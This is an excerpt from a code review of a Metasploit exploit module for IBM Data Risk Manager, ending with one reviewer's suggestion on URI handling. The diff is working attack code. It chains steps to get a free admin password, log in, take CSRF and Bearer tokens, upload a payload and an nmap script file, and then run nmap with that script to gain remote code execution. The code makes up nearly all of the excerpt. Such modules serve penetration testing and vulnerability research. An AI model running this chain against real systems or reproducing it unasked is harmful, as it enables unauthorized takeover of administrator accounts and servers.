modules/exploits/linux/http/ibm_drm_rce.rb

```diff
@@ -0,0 +1,321 @@
+      'headers' => { 'CSRF-TOKEN' => csrf },
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    })
+
+    unless res && (res.code == 200)
+      fail_with(Failure::Unknown, "#{peer} - Failed to upload nmap script file.")
+    end
+
+    print_good("#{peer} - and our nmap script file!")
+  end
+
+  def obtain_bearer_token(password)
+    # step 7: we need to authenticate again to get a Bearer token (instead of the cookie we already have)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('', nil, nil, content_disposition = 'form-data; name="deviceid"')
+    post_data.add_part(password, nil, nil, content_disposition = 'form-data; name="password"')
+    post_data.add_part('admin', nil, nil, content_disposition = 'form-data; name="username"')
+    post_data.add_part('', nil, nil, content_disposition = 'form-data; name="clientDetails"')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'user', 'login'),
+      'method' => 'POST',
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    })
+
+    unless res && (res.code == 200) && res.body =~ /\"data\":\{\"access_token\":\"([0-9a-f\-]{36})\",\"token_type\":\"bearer\"/
+      fail_with(Failure::Unknown, "#{peer} - Failed to obtain Bearer token.")
+    end
+
+    bearer = Regexp.last_match(1)
+    print_good("#{peer} - Bearer token #{bearer} obtained, wait for the final step where we invoke nmap...")
+
+    bearer
+  end
+
+  def exploit
+    # step 1: create a session ID and try to make it stick
+    session_id = create_session_id
+
+    # step 2: give the session ID to the server and have it grant us a free admin password
+    password = free_the_admin(session_id)
+
+    # step 3: login and get an authenticated cookie
+    # step 4: obtain CSRF header in order to be able to make valid requests
+    cookie, csrf = login_and_csrf(password)
+
+    patches_path = get_patches_path(cookie, csrf)
+
+    # step 5: upload our payload
+    # step 6: upload our script file
+    upload_payload_and_script(cookie, csrf, patches_path)
+
+    # step 7: we need to authenticate again to get a Bearer token (instead of the cookie we already have)
+    bearer = obtain_bearer_token(password)
+
+    # step 8 and final: invoke the nmap scan with our script file
+    script = "--script=#{@script_filepath}"
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('', nil, nil, content_disposition = 'form-data; name="clientDetails"')
+    post_data.add_part('1', nil, nil, content_disposition = 'form-data; name="type"')
+    post_data.add_part('', nil, nil, content_disposition = 'form-data; name="portRange"')
+    post_data.add_part(script, nil, nil, content_disposition = 'form-data; name="ipAddress"')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'restAPI', 'v2', 'nmap', 'run', 'scan', rand(99 + 1).to_s),
```

Comment:
```suggestion
      'uri' => normalize_uri(target_uri.path, 'albatross', 'restAPI', 'v2', 'nmap', 'run', 'scan', rand(99 + 1).to_s),
```

You can also use a `..` range with `rand`.